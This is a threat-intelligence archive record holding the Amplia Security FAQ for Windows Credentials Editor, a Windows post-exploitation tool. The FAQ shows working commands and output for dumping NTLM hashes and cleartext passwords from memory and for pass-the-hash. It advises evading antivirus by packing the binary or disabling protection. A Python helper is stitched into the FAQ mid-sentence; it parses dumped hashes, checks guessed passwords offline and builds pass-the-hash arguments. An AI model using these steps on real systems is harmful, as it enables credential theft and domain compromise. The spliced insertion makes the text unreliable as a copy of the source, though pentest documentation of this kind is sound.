{
	"id": "fd729810-9cba-4688-8c29-5c6439740937",
	"created_at": "2026-04-06T02:11:44.327544Z",
	"updated_at": "2026-04-10T03:24:29.827847Z",
	"deleted_at": null,
	"sha1_hash": "59719f536700db146df18aa96ae501460d8c1f74",
	"title": "Amplia Security - Research - WCE FAQ",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 86331,
	"plain_text": "Amplia Security - Research - WCE FAQ\r\nBy ampliasecurity.com\r\nArchived: 2026-04-06 02:10:30 UTC\r\nWhat is WCE?\r\nWhat is the current version of WCE?\r\nWho should use WCE?\r\nWhat Operating Systems does WCE support?\r\nIs WCE like cachedump?\r\nIs WCE like pwdump?\r\nIs WCE like Cain \u0026 Abel?\r\nWhere can I find more information about how WCE works?\r\nWhere can I find information on how to use WCE on a pentest?\r\nWhat privileges do I need to run WCE?\r\nHow do I list NTLM credentials in memory?\r\nHow do I change my current NTLM credentials?\r\nHow do I create a new logon session and launch a program with new NTLM credentials?\r\nHow can I generate NTLM hashes with WCE? (for testing purposes)\r\nWhat is 'safe mode'?\r\nHow can I write hashes obtained by WCE to a file?\r\nHow can I dump logon cleartext passwords with WCE?\r\nHow can I prevent WCE dumping my logon password in cleartext?\r\nWCE is detected by the antivirus/HIPS. what can I do to avoid detection?\r\nWhat is GETLSASRVADDR.EXE?\r\nWhen should I use GETLSASRVADDR.EXE?\r\nI can't get GETLSASRVADDR.EXE to work. What's the problem?\r\nWho's the author of WCE? 
Is he also the author of the PSH Toolkit?\r\nHow is WCE better than the PSH Toolkit?\r\nWhat is WCE?\r\nWindows Credentials Editor (WCE) is a security tool that allows users to list Windows logon sessions and add, change,\r\nlist and delete the associated credentials (e.g.: LM/NT hashes, Kerberos tickets and cleartext passwords).\r\nThe tool allows users to:\r\n- Perform Pass-the-Hash on Windows\r\n- 'Steal' NTLM credentials from memory (with and without code injection)\r\n- 'Steal' Kerberos tickets from Windows machines\r\nhttps://web.archive.org/web/20240904163410/https://www.ampliasecurity.com/research/wcefaq.html\r\nPage 1 of 8\n\n- Use the 'stolen' Kerberos tickets on other Windows or Unix machines to gain access to systems and\r\nservices\r\n- Dump cleartext passwords stored by Windows authentication packages\r\nWCE is a security tool widely used by security professionals to assess the security of Windows networks via\r\nPenetration Testing.\r\nWhat is the current version of WCE?\r\nThe current version of WCE 32bit is v1.42beta; you can download it here and the current version of WCE 64bit is\r\nv1.42beta; you can download it here. Since version 1.4beta there is also a \"Universal Binary\" which runs on both\r\n32bit and 64bit platforms; you can download it here.\r\nWho should use WCE?\r\nWCE is aimed at security professionals and penetration testers. It is basically a post-exploitation tool to 'steal' and\r\nreuse NTLM hashes, Kerberos tickets and plaintext passwords, which can then be used to compromise other\r\nmachines. Under certain circumstances, WCE can allow you to compromise the whole Windows domain after\r\ncompromising only one server or workstation.\r\nWhat Operating Systems does WCE support?\r\nWCE supports Windows XP, Windows 2003, Vista, Windows 7 and Windows 2008 (all SPs, 32bit and 64bit\r\nversions).\r\nIs WCE like cachedump?\r\nNO. 
Cachedump obtains NTLM credentials from the Windows Credentials Cache (aka logon cache, logon\r\ninformation cache, etc).\r\nThis cache can be disabled, and it is very often disabled by network/domain/Windows administrators (see\r\nhttp://support.microsoft.com/kb/172931).\r\nWCE will be able to steal credentials even when this cache is disabled.\r\nWCE obtains NTLM credentials from memory, where the system keeps them in order to perform SSO; it uses a series of\r\ntechniques the author of WCE developed and published some years ago.\r\nAlso, cachedump does not allow you to perform Pass-the-Hash, nor does it allow you to 'steal' and reuse Kerberos\r\ntickets.\r\nIs WCE like pwdump?\r\nNO. Pwdump dumps NTLM credentials from the local SAM. WCE dumps credentials from memory, where the system\r\nkeeps them in order to perform SSO; it uses a series of techniques the author of WCE developed and published\r\nsome years ago.\r\nThis is one of the reasons why you may be able to compromise the whole Windows domain after compromising a\r\nregular server: NTLM credentials stored in memory and obtained by WCE could have been left there, for\r\nexample, by Domain Administrators that connected to the server using RDP. In this scenario, pwdump will only\r\nallow you to obtain the NTLM credentials of the local SAM, which will probably be useless, since the server is not\r\nthe domain controller.\r\nAlso, pwdump does not allow you to perform Pass-the-Hash, nor does it allow you to 'steal' and reuse Kerberos\r\ntickets.\r\nIs WCE like Cain \u0026 Abel?\r\nNo. WCE and Cain \u0026 Abel are two different tools with different functionality. 
In fact, Cain \u0026 Abel does not\r\nimplement any of the functionality implemented by WCE, for example:\r\n* It does not implement Pass-the-Hash natively in Windows\r\n* It does not dump NTLM hashes stored in memory (it dumps local and remote SAMs, which is not the same\r\nthing. For more information read Post-Exploitation with WCE)\r\n* It does not implement Pass-the-Ticket for Kerberos\r\n* It does not dump cleartext logon passwords stored in memory\r\n* etc.\r\nThis does not imply WCE is a better tool; Cain \u0026 Abel also implements many things WCE does not. They are just\r\ndifferent tools with different functionality. You should use both!\r\nWhere can I find more information about how WCE works?\r\n\"WCE Internals\" presentation. RootedCon 2011; Madrid, Spain. (download)\r\nWhere can I find information on how to use WCE on a pentest?\r\n\"Post-Exploitation with WCE\" presentation, UBA 2011 - Spanish (download) - English (download)\r\nWhat privileges do I need to run WCE?\r\nYou need local administrator privileges to run WCE and be able to steal NTLM credentials from memory. This is\r\na post-exploitation tool.\r\nYou also need local administrator privileges to perform Pass-the-Hash (change your current NTLM credentials,\r\nor launch a new program in a new Windows logon session with the NTLM credentials specified).\r\nHow do I list NTLM credentials in memory?\r\nBy default, WCE lists the NTLM credentials in memory; there is no need to specify any options.\r\nFor example:\r\nC:\\Users\\test\u003ewce.exe\r\nWCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa\r\n(hernan@ampliasecurity.com)\r\nUse -h for help.\r\ntheuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537\r\nC:\\Users\\test\u003e\r\nEach credential line has the form username:domain:LMhash:NThash. In this case, only one user/credential set is listed. 
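Added example (this is not WCE's code, nor anything published by Amplia Security): a Python script that parses the username:domain:LMhash:NThash lines WCE prints, interprets the two LM hash halves, reproduces the NT half of what 'wce.exe -g' outputs (the NT hash is MD4 over the UTF-16LE encoding of the password, covered in the -g section that follows), checks a candidate password offline against a dumped NT hash, and assembles the argument string that 'wce.exe -s' expects (covered in the -s section that follows). The first credential line in the sample is the one listed above; the second line, the svc_backup account, is constructed for the example. The MD4 routine is written out because hashlib's md4 is frequently unavailable under OpenSSL 3.

```python
# Added example, not WCE code: parse WCE credential listings and reproduce
# the NT half of 'wce.exe -g <password>' (MD4 over the UTF-16LE password).
import re
import struct

# Constructed sample in the listing format shown on this page
# (username:domain:LMhash:NThash). The svc_backup record is invented.
SAMPLE_WCE_OUTPUT = '''WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa
Use -h for help.
theuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537
svc_backup:AMPLIALABS:AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C
'''

# LM hash half of an empty 7-byte password block (DES of KGS!@#$% under a zero key)
BLANK_LM_HALF = 'AAD3B435B51404EE'
CRED_RE = re.compile(r'^([^:]+):([^:]*):([0-9A-Fa-f]{32}):([0-9A-Fa-f]{32})$')
MASK = 0xFFFFFFFF


def _rol(x, s):
    return ((x << s) | (x >> (32 - s))) & MASK


def md4(data):
    '''MD4 per RFC 1320, written out because hashlib md4 is often disabled.'''
    bit_len = len(data) * 8
    data = bytes(data) + bytes([0x80])
    data += bytes((56 - len(data) % 64) % 64)          # zero padding to 56 mod 64
    data += struct.pack('<Q', bit_len)                 # message length in bits, little-endian
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(data), 64):
        X = struct.unpack('<16I', data[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):                            # round 1
            t = (a + f(b, c, d) + X[i]) & MASK
            a, b, c, d = d, _rol(t, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):                            # round 2
            t = (a + g(b, c, d) + X[(i % 4) * 4 + i // 4] + 0x5A827999) & MASK
            a, b, c, d = d, _rol(t, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):                            # round 3
            t = (a + h(b, c, d) + X[r3[i]] + 0x6ED9EBA1) & MASK
            a, b, c, d = d, _rol(t, (3, 9, 11, 15)[i % 4]), b, c
        a0, b0 = (a0 + a) & MASK, (b0 + b) & MASK
        c0, d0 = (c0 + c) & MASK, (d0 + d) & MASK
    return struct.pack('<4I', a0, b0, c0, d0)


def nt_hash(password):
    '''The NT half of what wce.exe -g prints: MD4 of the UTF-16LE password.'''
    return md4(password.encode('utf-16-le')).hex().upper()


def describe_lm(lm_hex):
    '''What the two 8-byte LM halves reveal about the password length.'''
    first, second = lm_hex.upper()[:16], lm_hex.upper()[16:]
    if first == BLANK_LM_HALF and second == BLANK_LM_HALF:
        return 'no LM hash stored (LM disabled or password longer than 14 chars)'
    if second == BLANK_LM_HALF:
        return 'password is at most 7 characters (second LM half is blank)'
    return 'password is 8 to 14 characters (both LM halves populated)'


def parse_wce_output(text):
    '''Credential records from a WCE listing; banner and help lines are skipped.'''
    records = []
    for line in text.splitlines():
        m = CRED_RE.match(line.strip())
        if m:
            user, domain, lm, nt = m.groups()
            records.append({'user': user, 'domain': domain, 'lm': lm.upper(),
                            'nt': nt.upper(), 'lm_note': describe_lm(lm)})
    return records


def pth_argument(record):
    '''The value wce.exe -s expects: username:domain:lmhash:nthash.'''
    return ':'.join([record['user'], record['domain'], record['lm'], record['nt']])


def password_matches(record, candidate):
    '''Offline check of a guessed password against a dumped NT hash.'''
    return nt_hash(candidate) == record['nt']


if __name__ == '__main__':
    for rec in parse_wce_output(SAMPLE_WCE_OUTPUT):
        print(pth_argument(rec), '#', rec['lm_note'])
        if password_matches(rec, 'password'):
            print('  NT hash matches the candidate password')
```

The LM hash listed above ends in AAD3B435B51404EE; that constant is the LM encryption of an empty 7-byte half, so the second half of the password was empty and the password is at most 7 characters. A hash of AAD3B435B51404EEAAD3B435B51404EE (both halves blank) means no LM hash was stored at all, either because LM storage is disabled or because the password is longer than 14 characters. Run the script as-is to print the two records with their notes; the NT hash of the constructed second record is that of the candidate 'password'.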
If there are more in memory, more will be displayed.\r\nHow do I change my current NTLM credentials?\r\nwce.exe -s \u003cusername\u003e:\u003cdomain\u003e:\u003clmhash\u003e:\u003cnthash\u003e\r\nFor example:\r\nC:\\Users\\test\u003ewce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537\r\nWCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa\r\n(hernan@ampliasecurity.com)\r\nUse -h for help.\r\nChanging NTLM credentials of current logon session (00024E1Bh) to:\r\nUsername: testuser\r\ndomain: amplialabs\r\nLMHash: 01FC5A6BE7BC6929AAD3B435B51404EE\r\nNTHash: 0CB6948805F797BF2A82807973B89537\r\nNTLM credentials successfully changed!\r\nC:\\Users\\test\u003e\r\nNote that this replaces the NTLM credentials of the whole current logon session, so every process running in that\r\nsession, not only the shell that ran WCE, will use the new credentials for NTLM authentication from then on.\r\nHow do I create a new logon session and launch a program with new NTLM credentials?\r\nwce.exe -s \u003cusername\u003e:\u003cdomain\u003e:\u003clmhash\u003e:\u003cnthash\u003e -c \u003cprogram\u003e\r\nFor example:\r\nC:\\Users\\test\u003ewce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537 -c cmd.exe\r\nWCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa\r\n(hernan@ampliasecurity.com)\r\nUse -h for help.\r\nChanging NTLM credentials of new logon session (000118914h) to:\r\nUsername: testuser\r\ndomain: amplialabs\r\nLMHash: 01FC5A6BE7BC6929AAD3B435B51404EE\r\nNTHash: 0CB6948805F797BF2A82807973B89537\r\nNTLM credentials successfully changed!\r\nC:\\Users\\test\u003e\r\nAt this point, a new cmd.exe instance will be launched, and network connections using NTLM initiated from that\r\ninstance will use the NTLM credentials specified. 
Of course, you can run any program, not just cmd.exe.\r\nThis feature is very useful, because you can do many tests and do Pass-the-Hash with many different users\r\nwithout having to change your current Windows logon session and credentials.\r\nHow can I generate NTLM hashes with WCE? (for testing purposes)\r\nwce.exe -g \u003ccleartext password\u003e\r\nFor example:\r\nC:\\Users\\test\u003ewce.exe -g mypassword\r\nWCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa\r\n(hernan@ampliasecurity.com)\r\nUse -h for help.\r\nPassword: mypassword\r\nHashes: 74AC99CA40DED420DC1A73E6CEA67EC5:A991AE45AA987A1A48C8BDC1209FF0E7\r\nC:\\Users\\test\u003e\r\nWhile testing WCE, and other things, it is very common to need to generate LM and NT hashes from a\r\npassword. This can be done using the '-g' parameter as shown above; the output is printed as LMhash:NThash, the same\r\norder the -s switch expects.\r\nWhat is 'safe mode'?\r\nWCE is the first and only tool that can read NTLM credentials stored by Windows in memory without injecting\r\ncode. WCE is able to locate and understand the undocumented structures used by Windows to store the\r\ncredentials, find the encryption keys and decrypt the credentials just by reading the system's memory.\r\nThis technique is very safe (after all, the tool is just reading memory; hence the name 'safe mode') and tries to\r\nensure that the system where WCE is executed will not crash. 
This is extremely important if you are a penetration\r\ntester and want to run WCE without risking a server crash.\r\nWCE will automatically attempt to use this technique first when obtaining NTLM credentials from memory;\r\nhowever, it will also automatically attempt code injection if the first technique fails.\r\nFor this reason, if you want to ensure WCE will only attempt to obtain NTLM credentials by reading memory\r\n(without code injection), you can use the -f switch (Force 'safe mode').\r\nExample:\r\nC:\\Users\\test\u003ewce.exe -f\r\nWCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa\r\n(hernan@ampliasecurity.com)\r\nUse -h for help.\r\ntheuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537\r\nC:\\Users\\test\u003e\r\nHaving said that, you use the tool at your own risk; no guarantee is given.\r\nHow can I write hashes obtained by WCE to a file?\r\nUse the -o switch. For example:\r\nC:\\\u003ewce -o output.txt\r\nWCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa\r\n(hernan@ampliasecurity.com)\r\nUse -h for help.\r\nC:\\\u003etype output.txt\r\ntest:AMPLIALABS:01020304050607080900010203040506:98971234567865019812734576890102\r\nC:\\\u003e\r\nAs the example shows, with -o the credentials are written to the file and are not echoed on the console.\r\nHow can I dump logon cleartext passwords with WCE?\r\nThe -w switch can be used to dump logon passwords stored in cleartext by the Windows Digest Authentication\r\npackage. 
For example:\r\nC:\\\u003ewce -w\r\nWCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa\r\n(hernan@ampliasecurity.com)\r\nUse -h for help.\r\ntest\\MYDOMAIN:mypass1234\r\nNETWORK SERVICE\\WORKGROUP:test\r\nEach line has the form username\\domain:password. A video on the original page shows the use of the -w switch on a Windows 2008 Server.\r\nHow can I prevent WCE dumping my logon password in cleartext?\r\nWhen you log in to a Windows system, your cleartext password is handed over to all the Security Packages\r\ninstalled on the system. This includes the NTLM security package (msv1_0.dll), the Kerberos security package\r\n(kerberos.dll), the Digest Authentication Security Package (wdigest.dll), etc. These packages take the cleartext\r\npassword and do whatever they need with it. For example, the NTLM security package generates and stores\r\nin memory the NTLM hashes, discarding the cleartext password, while the Digest Authentication package stores\r\nthe cleartext password itself in memory (encrypted). 
The techniques WCE implements consist precisely of extracting\r\nthese credentials from the memory of these packages.\r\nFor this reason, one of the ways to prevent WCE dumping your cleartext login password and other credentials is to\r\navoid loading the Security Packages from which WCE retrieves them.\r\nThese are defined in the registry at the following location (a REG_MULTI_SZ value):\r\nHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages\r\nYou will find there a list similar to the following:\r\nkerberos\r\nmsv1_0\r\nschannel\r\nwdigest\r\ntspkg\r\npku2u\r\nYou can remove an item from the list and (after rebooting) Windows will not load the corresponding Security\r\nPackage.\r\nFor example, you can remove wdigest and tspkg, and WCE will not be able to dump the cleartext passwords stored\r\nby these packages, simply because they will not be loaded anymore.\r\nAlthough this works, keep in mind that you may encounter problems if your environment uses one of the security\r\npackages removed; you will need to test how this affects you specifically. Also, removing fundamental security\r\npackages like msv1_0 can have catastrophic consequences, so apply this technique at your own risk.\r\nWCE is detected by the antivirus/HIPS. What can I do to avoid detection?\r\nUse a PE packer, for example UPX. 
If UPX does not do the trick, try other PE packers; there are many available.\r\nAlso, since you need administrator privileges to run WCE, try disabling the AV/HIPS before running WCE...\r\nWhat is GETLSASRVADDR.EXE?\r\nGETLSASRVADDR.exe is a tool (included with WCE) that can be used to automatically obtain the addresses WCE\r\nneeds in order to read logon sessions and NTLM credentials from memory (without code injection)\r\nwhen WCE is not able to do so by itself out-of-the-box.\r\nThe addresses obtained can then be passed to WCE using the -A switch.\r\nThis tool requires the DLLs symsrv.dll and dbghelp.dll, available from the \"Debugging Tools for Windows\"\r\npackage.\r\nWhen should I use GETLSASRVADDR.EXE?\r\nBasically, you should use GETLSASRVADDR.exe when you want to use 'safe mode' to extract hashes from\r\nmemory on a system where out-of-the-box WCE is unable to make it work.\r\nGETLSASRVADDR.exe will give you the information WCE needs to get 'safe mode' working.\r\nI can't get GETLSASRVADDR.EXE to work. What's the problem?\r\nThe most common source of problems is that you are missing the DLL files symsrv.dll and dbghelp.dll, available\r\nfrom the \"Debugging Tools For Windows\" package.\r\nThis is most likely the case if you are getting the following error message:\r\nConnecting to Microsoft.com symbol server...please wait..\r\nError: cannot find symsrv.dll\r\nError: Cannot obtain addresses\r\nRead the presentation WCE Internals for an explanation of why these DLLs are required.\r\nThe tool getlsasrvaddr.exe is meant to be run on the attacker's machine, not on compromised machines, so\r\nthis requirement should not be an issue. As the first line of the error output shows, it also needs network access to\r\nthe Microsoft symbol server, and it must be run against a copy of lsasrv.dll from the target system.\r\nAnother common issue is having UAC enabled and not being able to access c:\\windows\\system32\\lsasrv.dll. In\r\nthis case, just copy lsasrv.dll to another directory and try again.\r\nWho's the author of WCE? 
Is he also the author of the PSH Toolkit?\r\nThe author of WCE is Hernan Ochoa (hernan [ at ] ampliasecurity.com); and yes, he is also the author of the now\r\ndefunct Pass-The-Hash Toolkit.\r\nHow is WCE better than the PSH Toolkit?\r\nThe Pass-The-Hash (PSH) Toolkit does not work anymore. It does not support newer updates for Windows XP\r\nand 2003, and it does NOT support Windows 7 and 2008 at all.\r\nWCE is basically a complete rewrite from scratch; it uses new techniques and automatically does many things to\r\nmake it easier to use and to make it work out of the box on more platforms. It also works with all the Windows\r\nversions listed above, including Windows 7 and 2008, and it is the only tool that is able to obtain credentials just by reading\r\nmemory, which is very important to penetration testers, since this means the chances of crashing a server when\r\nusing WCE are almost zero (although neither the author nor Amplia Security guarantees this in any way; you use\r\nthe tool at your own risk).\r\nAlso, the PSH Toolkit does not allow you to 'steal' and reuse Kerberos tickets.\r\n(Note: remember the author of WCE is also the author of the PSH Toolkit).\r\nSource: https://web.archive.org/web/20240904163410/https://www.ampliasecurity.com/research/wcefaq.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://web.archive.org/web/20240904163410/https://www.ampliasecurity.com/research/wcefaq.html"
	],
	"report_names": [
		"wcefaq.html"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775441504,
	"ts_updated_at": 1775791469,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/59719f536700db146df18aa96ae501460d8c1f74.pdf",
		"text": "https://archive.orkl.eu/59719f536700db146df18aa96ae501460d8c1f74.txt",
		"img": "https://archive.orkl.eu/59719f536700db146df18aa96ae501460d8c1f74.jpg"
	}
}